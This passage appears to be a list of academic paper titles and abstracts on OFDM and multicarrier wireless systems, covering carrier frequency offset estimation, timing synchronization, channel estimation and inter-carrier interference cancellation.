Frequency-domain equalization (FDE) based on minimum mean square error (MMSE) criterion is a promising equalization technique for the broadband single-carrier (SC) transmission. However, the presence of timing offset produces the inter-symbol interference (ISI) and degrades the bit error rate (BER) performance. As the roll-off factor of the transmit filter increases, the performance degradation gets larger. In this paper, we propose joint MMSE-FDE & spectrum combining which can achieve the frequency diversity gain while suppressing the negative impact of timing offset for the SC transmission. --- paper_title: SINR Lower Bound Based Multiuser Detector for Uplink MC-CDMA Systems with Residual Frequency Offset paper_content: For uplink multi-carrier code-division multiple access (MC-CDMA) systems, we propose a multiuser detector that is robust to a small residual frequency offset existing after frequency offset estimation and compensation. In this paper, when the residual frequency offset is normalized by subcarrier spacing, it is called a normalized residual frequency offset (NRFO). In the proposed scheme, we first derive a lower bound of the signal-to-interference plus noise ratio (SINR) of the desired user when the NRFO of the desired user is bounded by a small value and the value is known to the receiver. We then design a detection filter to maximize the SINR lower bound. Simulation results show that the proposed scheme has better SINR and bit error rate (BER) performances in a high signal-to-noise ratio (SNR) region than a conventional minimum mean square error (MMSE) receiver that ignores the NRFO. --- paper_title: Semiblind Iterative Data Detection for OFDM Systems with CFO and Doubly Selective Channels paper_content: Data detection for OFDM systems over unknown doubly selective channels (DSCs) and carrier frequency offset (CFO) is investigated. A semiblind iterative detection algorithm is developed based on the expectation-maximization (EM) algorithm. It iteratively estimates the CFO, channel and recovers the unknown data using only limited number of pilot subcarriers in one OFDM symbol. In addition, efficient initial CFO and channel estimates are also derived based on approximated maximum likelihood (ML) and minimum mean square error (MMSE) criteria respectively. Simulation results show that the proposed data detection algorithm converges in a few iterations and moreover, its performance is close to the ideal case with perfect CFO and channel state information. --- paper_title: Parameter Estimation and Tracking in Physical Layer Network Coding paper_content: In this paper, we present an algorithm for joint decoding of the modulo-2 sum of the bits transmitted from two unsynchronized transmitters using Physical Layer Network Coding (PLNC). We address the problems that arise when the boundaries of the signals do not align with each other and when the channel parameters are slowly varying and are not known to the receiver at the relay node. Our approach first estimates jointly the timing and fading gains of both the signals, and uses a state-based Viterbi decoding scheme that takes into account the timing offsets between the interfering signals. We also track the amplitude and phase of the channel which may be slowly varying. Simulation results demonstrate the sensitivity of the detection performance at the relay node to the relative offset of the timings of the two user's signals as well as the advantage of our algorithm over previously published algorithms. --- paper_title: Impact of pilot pattern on carrier frequency recovery for TETRA-like multitone modulations paper_content: A study of maximum-likelihood pilot-aided frequency offset recovery for filtered multitone modulations such as that employed in the TETRA Release 2 Enhanced Data Service is presented. An approach is proposed to improve on previously published algorithms. When pilot symbols are arranged on a rectangular time–frequency grid, as envisaged by the cited standard, the acquisition range of a pilot-based frequency synchroniser may seem to be very narrow as it cannot exceed the inverse of pilot spacing in the time-domain. It is shown that the above drawback can be relieved by resorting to a pilot pattern where the pilot symbols are simply shifted in time along the subcarriers with respect to the rectangular arrangement. --- paper_title: Joint ml estimation of frame timing and carrier frequency offset for OFDM systems employing time-domain repeated preamble paper_content: When a preamble signal is repeated multiple times in OFDM systems, we derive joint maximum likelihood (ML) estimation of the frame timing (FT) and carrier frequency offset (CFO). Unlike conventional estimators which use correlation of adjacent repetition patterns only or some specific sets of patterns, the joint ML estimation exploits correlation of any pair of repetition patterns, providing optimized performance. To reduce the implementation complexity involved in the joint ML estimation, we also propose a near-ML estimation method that separates estimation of the FT and the CFO. The performance of the proposed methods is verified by computer simulation. --- paper_title: Blind timing and carrier synchronisation in distributed multiple input multiple output communication systems paper_content: This study addresses the problem of joint blind timing and carrier synchronisation in a (distributed-M ) × N antenna system where the objective is to estimate the M carrier offsets, the M timing offsets and to recover the transmitted symbols for each of the M users given only the measured signal at the N antennas of the receiver. The authors propose a modular receiver structure that exploits blind source separation to reduce the problem into more tractable sub-problems of estimating individual timing and carrier offsets for multiple users. This leads to a robust solution of low complexity. The authors investigate the performance of the estimators analytically using modified Cramer- Rao bounds and computer simulations. The results show that the proposed receiver exhibits robust performance over a wide range of parameter values, even with worst-case Doppler of 200- 300 Hz and frame size as small as 400 symbols. This work is relevant to future wireless networks and is a complete solution to the problem of estimating multiple timing and carrier offsets in distributed multiple input multiple output (MIMO) communication systems. --- paper_title: Preamble Based Joint CFO, Frequency-Selective I/Q-Imbalance and Channel Estimation and Compensation in MIMO OFDM Systems paper_content: A very promising technical approach for future wireless communication systems is to combine MIMO OFDM and Direct (up/down) Conversion Architecture (DCA). However, while OFDM is sensitive to Carrier Frequency Offset (CFO), DCA is sensitive to I/Q-imbalance. Such RF impairments can seriously degrade the system performance. For the compensation of these impairments, a preamble-based scheme is proposed in this paper for the joint estimation of CFO, transmitter (Tx) and receiver (Rx) frequency-selective I/Q-imbalance and the MIMO channel. This preamble is constructed both in time- and frequency domain and requires much less overhead than the existing designs. Moreover, Closed-Form Estimators (CLFE) are allowed, enabling efficient implementation. The advantages and effectiveness of the proposed scheme have been verified by numerical simulations. --- paper_title: Pilot-Aided Joint CFO and Doubly-Selective Channel Estimation for OFDM Transmissions paper_content: This paper studies the problem of pilot-aided joint carrier frequency offset (CFO) and channel estimation using Fisher and Bayesian approaches in orthogonal frequency division multiplexing (OFDM) transmissions over time- and frequency-selective (doubly selective) channels. In particular, the recursive-least-squares (RLS) and maximum-likelihood (ML) techniques are used to facilitate the Fisher estimation implementations. For the Bayesian estimation, the maximum-a-posteriori (MAP) principle is employed in formulating the joint estimation problem. With known channel statistics, the MAP-based estimation is expected to provide better performance than the RLS- and ML-based ones. To avoid a possible identifiability issue in the joint estimation problem, various basis expansion models (BEMs) are deployed as fitting parametric models for capturing the time-variation of the channels. Numerical results and related Bayesian Cramer Rao bounds (BCRB) demonstrate that the deployment of BEMs is able to alleviate performance degradation in the considered estimation techniques using the conventional block-fading assumption over time-varying channels. Among the considered schemes, the MAP-based estimation using the discrete prolate spheroidal (DPS) or Karhuen Loeve (KL) basis functions would be the best choice that can provide mean-squared-error (MSE) performance comparable to BCRB in low signal-to-noise ratio (SNR) conditions (e.g., coded OFDM transmissions). --- paper_title: Iterative Joint Estimation Procedure for Channel and Frequency Offset in Multi-Antenna OFDM Systems With an Insufficient Cyclic Prefix paper_content: This paper addresses a strategy to improve the joint channel and frequency offset (FO) estimation in multi-antenna systems, widely known as multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM), in the presence of intersymbol interference (ISI) and intercarrier interference (ICI) occasioned by an insufficient cyclic prefix (CP). The enhancement is attained by the use of an iterative joint estimation procedure (IJEP) that successively cancels the interferences located in the preamble of the OFDM frame, which is used for the joint estimation and initially contains the interferences due to a CP shorter than the channel length. The IJEP requires at certain steps a proper iterative interference cancellation algorithm, which makes use of an initial FO compensation and channel estimation obtained due to the use of a symmetric sequence in the preamble. After the iterative cancellation of interferences, the procedure performs an additional joint channel and FO estimation whose mean square error converges to the Cramér-Rao bound (CRB). Later on, this subsequent joint estimation permits the removal of the interferences in the data part of the frame, which are also due to an insufficient CP, in the same iterative fashion but saving iterations compared with the use of other estimation strategies. The appraisal of the procedure has been performed by assessing the convergence of the simulated estimators to the CRB as a function of the number of iterations. Additionally, simulations for the evaluation of the bit error rate (BER) have been carried out to probe how the utilization of the proposed IJEP clearly improves the performance of the system. It is concluded that, with a reduced number of iterations in the preamble, the IJEP converges to the theoretical bounds, thus reducing the disturbances caused by a hard wireless channel or a deliberately insufficient CP. Therefore, this eases the interference cancellation in the data part, leading to an improvement in the BER that approximates to the ideal case of a sufficient CP and, consequently, an improvement in the computational cost of the whole procedure that has been analyzed. --- paper_title: Estimation algorithms of multiple channels and carrier frequency offsets in application to multiuser OFDM systems paper_content: This paper introduces new joint estimation methods of multiple carrier frequency offsets (CFOs) and channel impulse responses (CIR) in application to multiuser orthogonal frequency division multiplexing (OFDM) systems. The estimators are derived from the optimal maximum-likelihood (ML) principle. Complexity reductions are achieved by exploiting the correlation properties of the training sequence (TS). The grid search algorithm is converted into a polynomial root finding procedure which leads to low-complexity closed-form estimators for moderate CFOs. Furthermore, iterative estimators for larger CFOs are proposed. Numerical results confirm that the performance degradation due to the approximations compared to the Cramer-Rao bound (CRB) is small and may be negligible in practice. --- paper_title: A Low-Delay Low-Complexity EKF Design for Joint Channel and CFO Estimation in Multi-User Cognitive Communications paper_content: Parameter estimation in cognitive communications can be formulated as a multi-user estimation problem, which is solvable under maximum likelihood solution but involves high computational complexity. This paper presents a time-sharing and interference mitigation based EKF (Extended Kalman Filter) design for joint CFO (carrier frequency offset) and channel estimation at multiple cognitive users. The key objective is to realize low implementation complexity by decomposing high-dimensional parameters into multiple separate low-dimensional estimation problems, which can be solved in a time- shared manner via pipelining operation. We first present a basic EKF design that estimates the parameters from one TX user to one RX antenna. Then such basic design is time-shared and reused to estimate parameters from multiple TX users to multiple RX antennas. Meanwhile, we use interference mitigation module to cancel the co-channel interference at each RX sample. In addition, we further propose adaptive noise variance tracking module to improve the estimation performance. The proposed design enjoys low delay and low buffer size (because of its online real-time processing), as well as low implementation complexity (because of time-sharing and pipeling design). Its estimation performance is verified to be close to Cramer-Rao bound. --- paper_title: Frequency-domain processing for synchronization and channel estimation in OQAM-OFDM systems paper_content: In this work the design of a frequency-domain synchronization and channel estimation scheme for OQAM-OFDM systems is presented and evaluated. The need for signal processing schemes for wireless communication systems, that are processed solely in the frequency domain results from the desire to build frequency-agile radios. Driven by the transition from exclusive spectrum resource allocation towards a dynamic usage of the spectrum a non-contiguous spectrum utilization in fragmented spectrum is needed. Well-known time-domain algorithms severely suffer from encapsulated spectral components not belonging to the non-contiguous OQAM-OFDM waveform. We show that frequency-domain processing can achieve similar system performance as comparable time-domain methods over a wide range of frequency offsets while offering a new degree of freedom in preamble design for FBMC systems. --- paper_title: Self-encoded multi-carrier spread spectrum with iterative despreading for random residual frequency offset paper_content: In this study, we investigate the multi-carrier spread spectrum (MCSS) communication system which adopts the self-encoded spread spectrum in a downlink synchronous channel. It is very difficult to completely eliminate the frequency offset in practical channel scenarios. We demonstrate that the self-encoded MCSS (SE-MCSS) with iterative despreading manifests a remarkable immunity to residual frequency offset. The SE-MCSS can be an excellent candidate for the future generation of wireless services. --- paper_title: Tight PEP Lower Bound for Constellation-Rotated Vector-OFDM Under Carrier Frequency Offset and Fast Fading paper_content: In this paper, we study pairwise error probability (PEP) of a system employing constellation-rotated vector orthogonal frequency-division multiplexing (CRV-OFDM), which is an enhancement of vector OFDM (V-OFDM) with enhanced diversity, over a frequency-selective channel with both carrier frequency offset (CFO) and Doppler frequency spread. First, we extend the work of Rugini and Banelli, which is known to give a good bit-error rate (BER) approximation for the standard OFDM system only with CFO, to PEP evaluation for CRV-OFDM and discuss its limitations. Then, we discuss the conditionally Gaussian characteristi2cs of the Doppler-induced interference and propose a conditionally Gaussian PEP approximation. Confirming a good match of the conditionally Gaussian PEP approximation and with simulation results, we propose a new semianalytical PEP lower bound. The new lower bound is computationally feasible and is shown by simulation to be tight for small to moderate CFO. Finally, a computationally more feasible approximation of the lower bound is also proposed. Our discussion reveals, as a by-product, why the Gaussian assumption for the Doppler-induced interference works for standard OFDM systems although the assumption is actually incorrect. --- paper_title: Cooperative Relaying Using OFDM in the Presence of Frequency Offsets paper_content: We study the performance of cooperative relaying using orthogonal frequency division multiplexing (OFDM) in the presence of frequency offsets due to Doppler shifts and oscillator instabilities. Through this study, several aspects of transmitter and receiver design, including channel coding, subcarrier mapping and channel estimation are brought to light. We develop two linear front-end receiver architectures based on practical single-user OFDM receivers, and demonstrate the performance using simulations under quasi-static multipath fading channel conditions. --- paper_title: Joint CFO and Channel Estimation for Asynchronous Cooperative Communication Systems paper_content: This letter addresses the joint maximum likelihood carrier frequency offset (CFO) and channel estimation for asynchronous cooperative communication systems. We first present a space-alternating generalized expectation-maximization (SAGE) based iterative estimator (SAGE-IE). Then a low-complexity approximate SAGE-IE (A-SAGE-IE) is developed. Our proposed algorithms decouple the multi-dimensional optimization problem into many one-dimensional optimization problems where the CFO and channel coefficients of each relay-destination link can be determined separately. Simulations indicate that, even though timing offsets are present, the proposed estimators can asymptotically achieve the Cramer-Rao bround (CRB) for the perfectly timing synchronized case. --- paper_title: Traffic-reduced precise ranging protocol for asynchronous UWB positioning networks paper_content: This letter proposes a precise two-way ranging (TWR) protocol toward low traffic for asynchronous UWB positioning networks. The proposed TWR protocol pursuing instantaneous ranging update enables the estimation of clock frequency offset to achieve high ranging accuracy. Theoretical analysis and simulation results verify the performance. --- paper_title: A novel channel estimation technique for OFDM systems with robustness against timing offset paper_content: A new interpolation based channel estimation technique has been proposed to eliminate the effect of phase rotation caused by symbol timing offset (STO) in comb-type pilot-aided OFDM systems. STO is one of the most severe impairments that leads to inter-symbol interference (ISI) and phase rotation of FFT outputs and results in performance degradation in OFDM systems. The main advantage of the proposed channel estimation technique is its insensitivity to the impact of phase rotation. Subsequently, the fine timing synchronization process (which tries to cancel the residual STO) in conventional timing synchronization methods can be eliminated. The main idea behind the proposed technique is to separate the phase and the magnitude components of the estimated channel frequency response at the pilot subcarriers. In this way, two steps of interpolation are performed for the both phase and magnitude, separately and independently. Computational complexity of the proposed channel estimation method is approximately equal to that of the conventional one. Analytical and simulation results of applying the proposed technique to the DVB-T system show that the achieved BER performance is close to that of conventional method in the absence of any timing offset, while in the presence of STO, the proposed technique outperforms the conventional method, considerably. --- paper_title: An Efficient Blind Deterministic Frequency Offset Estimator for OFDM Systems paper_content: This paper proposes an efficient blind deterministic carrier frequency offset (CFO) estimation method for orthogonal frequency division multiplexing (OFDM) systems. In the proposed method, two OFDM symbols with time difference are generated by exploiting both the oversampled OFDM signal and the cyclic prefix, and a cost function is introduced for CFO estimation. It is shown that the cost function can be expressed as a cosine function. Using a property of the cosine function, a formula for estimating the CFO is derived. The estimator of the CFO requires three independent cost function values calculated at three different frequency offsets. Using the formula, the CFO can be estimated without searching all the frequency offset range. The proposed method is very suitable for real wireless environments since it requires only one OFDM symbol for blind reliable estimation of CFO. The computer simulations show that the performance of the proposed method is superior to those of the MUSIC method and the oversampling method . Unlike the conventional methods such as MUSIC method and the oversampling method, the accuracy of the proposed method is independent of the searching step. --- paper_title: DoA Estimation with Compensation of Hardware Impairments paper_content: We consider the estimation of the direction of arrival (DoA) in the presence of hardware impairments that include the RF carrier frequency offsets, the phase offsets generated by an uncalibrated array, and the DC offset. The impairments model has been derived from the analysis of a hardware multiple antenna test-bed that uses direct down-conversion RF front-ends. The performance of the proposed algorithm has been investigated both analytically and via simulations. We show that the estimator provides good performance for a wide range of angles and it is robust to the hardware impairments. --- paper_title: Robust, Low-Complexity, and Energy Efficient Downlink Baseband Receiver Design for MB-OFDM UWB System paper_content: This paper presents optimized synchronization algorithms and architecture designs of a downlink baseband receiver for multiband orthogonal frequency division multiplexing ultra wideband (MB-OFDM UWB). The receiver system targets at low complexity and low power under the premise of good performance. At algorithm level, dual-threshold (DT) detection method is proposed for robust detection performance in timing synchronization; multipartite table method (MTM) is employed to implement arctangent and sin/cos functions in coarse frequency synchronization. MTM outperforms other state-of-the-art methods in power and area. A highly simplified phase tracking method is proposed with better performance in fine frequency synchronization. At architecture level, we focus on optimizing matched filter of packet detector, carrier frequency offset (CFO) corrector and FFT output reorder buffer. The proposed downlink baseband receiver is implemented with 0.13 /mi CMOS technology. The core area of layout is 2.66 × 0.94 mm2, which saves 45.1% hardware cost due to the low-complexity synchronization algorithms and architecture optimization. The postlayout power consumption is 170 mW at 132 MHz clock frequency, which is equivalent to 88 pJ/b energy efficiency at 480 Mbps data rate. --- paper_title: A fine carrier recovery algorithm robustto doppler shift for OFDM systems paper_content: In this paper, a fine carrier recovery algorithm is proposed to maintain the synchronization even in a severe Doppler shift for orthogonal frequency division multiplexing (OFDM) systems such as digital video broadcasting for handheld (DVB-H), DVB for terrestrial (DVB-T) and DVB-T2. The proposed algorithm estimates the frequency offset by utilizing correlation values in the received OFDM symbols by adding intentional frequency offsets. Its performance is compared with conventional algorithms for the DVB-H system in fading with Doppler. --- paper_title: Exact SINR analysis of wireless OFDM in the presence of carrier frequency offset paper_content: This paper presents a new mathematical analysis for the evaluation of the average signal-to-interference plus noise ratio (SINR) of orthogonal frequency division multiplexing (OFDM) in the presence of carrier frequency offset (CFO). CFO destroys the orthogonality between different subcarriers giving rise to inter-carrier interference (ICI). The SINR of wireless OFDM in the presence of CFO and frequency-selective fading becomes a ratio of correlated random variables, and the exact evaluation of its average by using direct methods requires a huge computational effort. In this paper, we present an indirect method that leads to a new exact simpler expression for the average SINR over Rayleigh multipath fading channels. --- paper_title: IQ Imbalance Estimation Scheme with Intercarrier Interference Self-Cancellation Pilot Symbols in OFDM Direct Conversion Receivers paper_content: Direct conversion receivers in orthogonal frequency division multiplexing (OFDM) systems suffer from direct current (DC) offset, frequency offset, and IQ imbalance. We have proposed an IQ imbalance estimation scheme in the presence of DC offset and frequency offset, which uses pilot subcarriers in the frequency domain. In this scheme, the DC offset is eliminated by a differential filter. However, the accuracy of IQ imbalance estimation is deteriorated due to the intercarrier interference (ICI) components caused by frequency offset. To overcome this problem, a new IQ imbalance estimation scheme with intercarrier interference self-cancellation pilot symbols in the frequency domain has been proposed in this paper. Numerical results obtained through computer simulation show that estimation accuracy and bit error rate (BER) performance are improved. --- paper_title: An Efficient Reduced-Complexity Two-Stage Differential Sliding Correlation Approach for OFDM Synchronization in the AWGN Channel paper_content: In this paper, we propose a new scheme for data- aided time and frequency synchronization for OFDM systems, based on a single-symbol preamble. The preamble, of useful length $2^{m}-2$, is composed of two consecutive identical m-sequences (with length $2^{m-1}-1$ each). This preamble is extended by a cyclic prefix of convenient length. This stucture is adequate for a two-stage synchronization scheme, namely a reduced complexity coarse synchronization stage, followed by a finer synchronization one. The first stage, based on Cox and Schmidl-like sliding correlation, determines a reduced uncertainty interval over which the fine stage is carried. The second stage is indeed based on a differential correlation, which is more complex compared to the first stage. The combined use of m-sequences and differential correlation offers an almost perfect peak of the computed metric at the preamble start. To assess the performance degradation occasioned by the reduction of complexity characterizing the proposed two-stage approach, we also consider the brute force single-stage approach, where differential correlation is exclusively used. As a byproduct of our two-stage approach, the fractional frequency offset is estimated and its performance is assessed and compared for both two- stage and one-stage approaches. The brute force approach outperfoms all the considered benchmarks. Compared to the reduced complexity scheme, the brute force one provides similar performance, at the expense of a significant complexity overload. Only for SNR lower than $-5$ dB, the brute force scheme presents a slight enhancement with respect to the reduced complexity one. The simulation results show that the proposed method gives better performance than any other considered estimator. Although our technique is expected to be well suited to multipath channels, thanks to the underlying properties of m-sequences, in this paper we focus on the Additive White Gaussian Noise channel. --- paper_title: An SFBC-OFDM receiver to combat multiple carrier frequency offsets in cooperative communications paper_content: In this paper, a new space-frequency combination technique is proposed for Alamouti coded Orthogonal Frequency Division Multiplexing (OFDM) in the context of cooperative communications. Since cooperative antennas are distributed, there may exist multiple carrier frequency offsets (MCFOs) which cause problems for conventional space-frequency decoding. The proposed algorithm, taking cues from existing MCFO-compensating algorithms [13][19], combines two sets of separately synchronized signal to mitigate inter-carrier interference (ICI). Iterative interference cancellation and a maximum-ratio-combining-like technique are also deployed to further improve performance with low computational complexity. It is observed that the proposed method achieves better bits error rate (BER) performance and has a superior tolerance of multiple CFOs, compared to existing methods. --- paper_title: Comments on “Estimation of Carrier Frequency Offset With I/Q Mismatch Using Pseudo-Offset Injection in OFDM Systems” paper_content: In a recently published paper, an estimation algorithm of carrier frequency offset (CFO) with I/Q mismatch was proposed. Errors in the derivation of the algorithm show that its precision can only be asserted in the case of relatively small I/Q mismatch. Averaging the intermediate variables among one short preamble period improves the estimation accuracy under conditions where I/Q mismatch is large. --- paper_title: Blind frequency-offset tracking scheme for multiband orthogonal frequency division multiplexing using time-domain spreading paper_content: A blind scheme for estimating the residual carrier-frequency offset of multiband orthogonal frequency division multiplexing (MB-OFDM)-based ultra-wideband (UWB) systems is proposed. In the MB-OFDM UWB system, time-domain spreading (TDS) is used by transmitting the same information across two adjacent OFDM symbols. By using the TDS structure, the proposed frequency estimation scheme does not require the use of pilot symbols. To demonstrate the usefulness of the proposed estimator, analytical expression of the mean square error is derived and the performance is compared with a conventional pilot-assisted estimator. --- paper_title: Joint Carrier Frequency Offset and Channel Estimation for Uplink MIMO-OFDMA Systems Using Parallel Schmidt Rao-Blackwellized Particle Filters paper_content: Joint carrier frequency offset (CFO) and channel estimation for uplink MIMO-OFDMA systems over time-varying channels is investigated. To cope with the prohibitive computational complexity involved in estimating multiple CFOs and channels, pilot-assisted and semi-blind schemes comprised of parallel Schmidt Extended Kalman filters (SEKFs) and Schmidt-Kalman Approximate Particle Filters (SK-APF) are proposed. In the SK-APF, a Rao-Blackwellized particle filter (RBPF) is developed to first estimate the nonlinear state variable, i.e. the desired user's CFO, through the sampling-importance-resampling (SIRS) technique. The individual user channel responses are then updated via a bank of Kalman filters conditioned on the CFO sample trajectories. Simulation results indicate that the proposed schemes can achieve highly accurate CFO/channel estimates, and that the particle filtering approach in the SK-APF outperforms the more conventional Schmidt Extended Kalman Filter. --- paper_title: A Joint Channel and Frequency Offset Estimator for the Downlink of Coordinated MIMO-OFDM Systems paper_content: The issues of frequency offset and channel estimation are considered for the downlink of coordinated multiple-input multiple-output orthogonal frequency-division multiplexing systems. Multiple carrier frequency offsets exist in this coordinated system. Without implementing an appropriate compensation for these offsets, both inter-carrier and inter-cell interference will degrade the system performance. Here, we adopt a parallel interference cancelation strategy to iteratively mitigate inter-cell interference, and propose a frequency offset estimator, approximated by a Hadamard product and a Taylor series expansion, to eliminate the inter-carrier interference. Our scheme is significantly less complex than existing methods. Furthermore, the proposed channel estimator is robust to frequency offsets and performs comparably well to these conventional approaches. --- paper_title: Joint Frequency Offset Tracking and PAPR Reduction Algorithm in OFDM Systems paper_content: This paper presents an algorithm that aims to reduce the peak-to-average power ratio (PAPR) of orthogonal frequency division multiplexing (QFDM) communication systems while maintaining frequency tracking. The algorithm achieves PAPR reduction by applying the complex conjugates of the data symbol obtained from the frequency domain to cancel the phase of the data symbol. A likelihood estimator is used to obtain the sub-carrier phase error due to the residual carrier frequency offset (RCFO) using the same complex conjugates as a pilot signal. Furthermore, a joint time and frequency domain multicarrier phase locked loop (MPLL) is developed to compensate additional frequency offset. Simulation results show that this algorithm is capable of reducing PAPR without impacting the frequency tracking performance. --- paper_title: General total inter-carrier interference cancellation for OFDM high speed aerial vehicle communication paper_content: Orthogonal Frequency Division Multiplexing (OFDM) has been considered as a strong candidate for next generation high speed aerial vehicle communication systems. However, OFDM systems suffers severe performance degradation due to inter-carrier interference (ICI) in high mobility channel, if no ICI cancellation is performed. Traditionally, training symbols have been employed in one packet to help the OFDM receiver to estimate the multi-path channel and the carrier frequency offset (CFO) between the transmitter local oscillator and the receiver local oscillator. However, in aerial vehicle communication, the relative transmitter-receiver speed changes so rapidly that it is unreasonable to assume a constant speed (and CFO) during the entire packet transmission. Hence, to accurately estimate the CFO, training symbols need to be transmitted for every OFDM symbol. Obviously, this significantly reduces OFDM throughput while adding complexity due to repeated CFO estimation. In this paper, we extend our previous work to propose a joint channel/CFO estimation and ICI cancellation algorithm. Specifically, in our previous work, we have proposed a total ICI cancellation algorithm using parallel processing for OFDM system which offers the excellent ICI cancellation and BER performance. However, in this work, perfect channel information was assumed. In this paper, we combine the channel estimation with the ICI cancellation together. The proposed general total ICI cancellation algorithm has the ability to jointly estimate the carrier frequency offset and channel information, and improve the performance significantly. Meanwhile, a serial processing is proposed to reduce the computation complexity. Simulation results in different scenarios confirm the performance of the proposed scheme in multipath fading channels for high speed aerial vehicle communication. --- paper_title: Low-Complexity Data-Detection Algorithm in Cooperative SFBC-OFDM Systems With Multiple Frequency Offsets paper_content: This paper addresses the problem of data detection in cooperative space-frequency block-coding (SFBC) orthogonal frequency-division multiplexing (OFDM) systems in the presence of multiple carrier frequency offsets (CFOs). A new ordered-successive parallel interference cancellation (OSPIC) detector is proposed. This method consists of first carrying out coarse ordered interference cancellation detection, where the interference components are successively eliminated, and then performing fine interference cancellation detection using parallel interference reduction. Simulation results show that the proposed detector significantly outperforms existing detectors and performs close to that of CFO-free systems for practical signal-to-noise ratios (SNRs). To further reduce the computational complexity, a minimum mean-square error (MMSE)-based reduced-complexity OSPIC (RC-OSPIC) detector is proposed. Compared with the MMSE detector, which requires a full-size complex matrix inversion, the proposed RC-OSPIC detector performs better and is computationally much more effective. --- paper_title: Integer frequency offset estimation by pilot subset selection for OFDM system with CDD paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for an OFDM system using multiple transmit antennas. However, the performance of post-FFT estimation, i.e. integer frequency offset (IFO) is deteriorated by high frequency selectivity introduced by CDD. Proposed is an IFO estimation scheme for an OFDM system with CDD. Based on the pilot subset partitioning, the proposed IFO estimation scheme reduces the effect of frequency selective fading by adopting the CDD. --- paper_title: A Novel Subspace Decomposition-Based Detection Scheme with Soft Interference Cancellation for OFDMA Uplink paper_content: Abstract-In this paper we propose a novel subspace decomposition-based detection scheme with the assistance of soft interference cancellation in the uplink of interleaved orthogonal frequency division multiple access (OFDMA) systems. By utilizing the inherent data structure, the interference is first separated with the desired symbol and then further decomposed into the one caused by the residues of decision errors and the other one by the undetected symbols in the successive interference cancellation (SIC) process.With such an ingenious interference decomposition along with the soft processing scheme, the new receiver can render more thorough interference cancellation, which in turn entails enhanced system performance. Moreover, for practical implementations, a low-complexity version, which only deal with the principal components of inter-carrier interference (ICI), is also addressed. Conducted simulations show that the developed receiver and its low-complexity implementation can provide superior performance compared with pervious works and is resilient to the presence of carrier-frequency offsets (CFOs). The low complexity implementation, in particular, requires substantially lower computational overhead with only slight performance loss. --- paper_title: Repeated correlative coding scheme for mitigation of inter-carrier interference in an orthogonal frequency division multiplexing system paper_content: In this study, a repeated correlative coding scheme is proposed to combat the inter-carrier interference (ICI) caused by the frequency offset in orthogonal frequency division multiplexing (OFDM) communication systems. This proposed scheme combine two ideas of the well-known methods, which are the coding of adjacent subcarriers with antipodal of the same data symbol (ICI self-cancellation) and correlative coding. A mathematical expression for the carrier-to-interference ratio (CIR) by using this proposed repeated correlative coding scheme is derived. The simulated result of CIR for the proposed scheme is significantly improved compared to the correlative coding as well as a self-cancellation scheme. The bit-error-rate (BER) of the proposed scheme is also compared with the ICI self-cancellation scheme and correlative coding scheme, which is comparable to that of the ICI self-cancellation scheme and better than the correlative coding scheme. --- paper_title: Concatenated Precoded OFDM for CFO Effect Mitigation paper_content: Orthogonal frequency-division multiplexing (OFDM) is highly sensitive to carrier frequency offset (CFO), which not only causes intercarrier interference (ICI) among subcarriers but introduces complex multiplicative distortion (CMD) to all detected subcarrier symbols as well. Due to unknown CFO, both ICI and CMD are time variant, thus complicating the data demodulation at the receiver. In conjunction with a training-prefixed data frame structure, a concatenated precoder that is constructed by concatenating an outer modified correlative precoder with an inner reduced Hadamard precoder is proposed in this paper to process data symbols prior to OFDM modulation and to enable joint estimation on channel multipath and constant CMD (CCMD), time-variant CMD (TCMD) estimation and compensation, and ICI suppression at the receiver in the presence of CFO. Simulation results show that the proposed system provides much better error performance than conventional signal coding approaches in the presence of CFO and multipath fading. --- paper_title: A Fast Time-Delay Estimator of PN Signals paper_content: This work proposes an effective time-delay estimator for PN satellite signals, exploiting a fast triangular interpolator, running on three estimated ambiguity samples in the neighborhood of the coarse estimate. Performance analysis (theory and simulation) is carried out in comparison with conventional approaches based on the interpolation, usually carried out by (time-consuming) narrow-band over-sampling or (fast) fitting of few samples of a smoothed function of the ambiguity function around its maximum. The theoretical results, substantiated by computer simulations, have evidenced that the devised method outperforms the conventional estimator for all the timing offsets and is well suited for satellite spread-spectrum communications. --- paper_title: CFO estimation in OFDM systems under timing and channel length uncertainties with model averaging paper_content: In this letter, we investigate the problem of CFO estimation in OFDM systems when the timing offset and channel length are not exactly known. Instead of explicitly estimating the timing offset and channel length, we employ a multi-model approach, where the timing offset and channel length can take multiple values with certain probabilities. The effect of multimodel is directly incorporated into the CFO estimator. Results show that the proposed estimator outperforms the estimator selecting only the most probable model and the method taking the maximal model. --- paper_title: Repeated preamble based carrier frequency offset estimation in the presence of I/Q imbalance paper_content: The paper proposes a novel estimation of carrier frequency offset (CFO) and I/Q imbalance, based on the popular repeated preamble. By investigating the nonlinear least squares cost function of CFO estimation, we discover a general relation among three arbitrary pilot symbols and derive several useful linear equations. Then, we propose a corresponding linear least squares estimation of unsigned CFO with explicit closed-form solution. Using the tentative CFO estimate, the I/Q imbalance can be estimated with sign ambiguity. Notice that the taps of the FIR filter representing frequency-dependent imbalance in practical frond-ends are constrained, we also propose a novel computation-free detection method to solve the sign ambiguity. --- paper_title: ESPRIT-Based Carrier Frequency Offset Estimation for OFDM Direct-Conversion Receivers paper_content: Over the last years, there has been growing interest in making user terminals more efficient in terms of cost, size, and power consumption. A step forward in this direction is represented by direct-conversion receiver (DCR) architectures, which directly convert the received waveform from the radio frequency (RF) to baseband, thereby avoiding any intermediate frequency (IF) stage. One major issue of DCR devices is the presence of RF impairments, which greatly complicate fundamental receiver functions, including the synchronization task. In this paper we propose a carrier frequency offset (CFO) recovery scheme for OFDM DCRs plagued by frequency-selective In-phase/Quadrature (I/Q) imbalances. Our approach is based on the ESPRIT algorithm and relies on the transmission of a typical OFDM training preamble having a repetitive structure in the time domain. Numerical simulations indicate that the proposed scheme outperforms existing state-of-the-art alternatives at the price of a certain increase of the processing load. --- paper_title: An interference self-cancellation technique for SC-FDMA systems paper_content: A new interference self-cancellation (ISC) method for Single Carrier-FDMA (SC-FDMA) systems is proposed to mitigate the inter-user interference caused by frequency offset or Doppler effect. By transmitting a compensation symbol at the first symbol location in each resource block, the energy leakage can be significantly suppressed. With little bandwidth and power sacrifice, the proposed method can greatly improve the system robustness against frequency offset. Simulation results show that the signal-to-interference ratio (SIR) can be improved by 7 dB on average for the entire system band, and up to 11.7 dB for an individual user. --- paper_title: Joint Channel, Carrier-Frequency-Offset and Noise-Variance Estimation for OFDM Systems Based on Expectation 